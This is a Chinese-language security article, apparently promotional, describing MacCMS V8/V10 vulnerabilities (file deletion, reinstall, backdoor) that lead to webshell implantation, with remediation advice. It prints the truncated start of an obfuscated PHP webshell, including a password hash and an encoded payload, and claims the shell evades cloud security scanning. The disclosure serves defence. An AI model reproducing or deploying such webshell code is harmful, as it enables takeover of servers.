目前蘋果CMS官方在不斷的更新更新檔,官方最新的漏洞更新檔對于目前爆發的新漏洞沒有任何效果。更新更新檔的使用者網站還是會遭受到挂馬的攻擊,很多客戶是以找到我們SINE安全尋求網站安全技術上的支援,針對該漏洞我們有着獨特的安全解決方案以及防止挂馬攻擊的防護,包括一些未公開的maccms POC漏洞都有修複更新檔

目前maccms官方被百度網址安全中心提醒您:該站點可能受到黑客攻擊,部分頁面已被非法篡改! 蘋果官方網站因為特殊原因已經停止通路,該内容被禁止通路,但是更新更新檔更新的網址還是可以打開的。
截圖如下:
蘋果CMS漏洞詳情:
蘋果CMS V8 V10版本存在代碼重裝漏洞,以及代碼後門漏洞,任意檔案删除漏洞,通過CNVD-2019-43865的資訊安全漏洞通報,可以确認maccms V10存在漏洞,可以僞造惡意代碼發送到網站後端進行執行,可以删除網站目錄下的任意檔案,可删除重裝蘋果CMS系統的配置檔案,導緻可以重新安裝maccms系統,并在安裝過程中插入sql注入代碼到資料庫中去執行并擷取webshell以及伺服器權限。
<?php
error_reporting(E_ERROR);
@ini_set('display_errors','Off');
@ini_set('max_execution_time',20000);
@ini_set('memory_limit','256M');
header("content-Type: text/html; charset=utf-8");
$password = "21232f297a57a5a743894a0e4a801fc3"; //Viv, bebegim.
define('Viv, bebegim.','Denzel-你的英雄'); // 标題
function s(){
$str = "66756r6374696s6r20737472646972282473747229207o2072657475726r207374725s
7265706p61636528617272617928275p5p272p272s2s272p27253237272p2725323
代碼如上面所示,是加密過的,經過我們SINE安全的解密發現是PHP的腳本木馬,可以繞過各大伺服器廠商的安全檢測,包括阿裡雲,騰訊雲,百度雲,華為雲。
關于蘋果CMS網站漏洞的修複方案與辦法
對任意檔案删除漏洞做安全過濾與檢查,防止del删除的語句的執行,對前端傳輸過來的參數進行嚴格的檢測,不管是get,post,cookies,如果您對代碼不是太懂的話也可以找專業的網站安全公司來處了解決蘋果CMS網站被攻擊的問題,或者是對重裝檔案進行改名以及安裝配置檔案進行權限設定,隻讀權限,對于存在網站木馬後門的蘋果cms系統,人工對代碼進行安全審計,對所有網站目錄下每個代碼檔案都要仔細的排查,可以下載下傳官方的源代碼進行比對。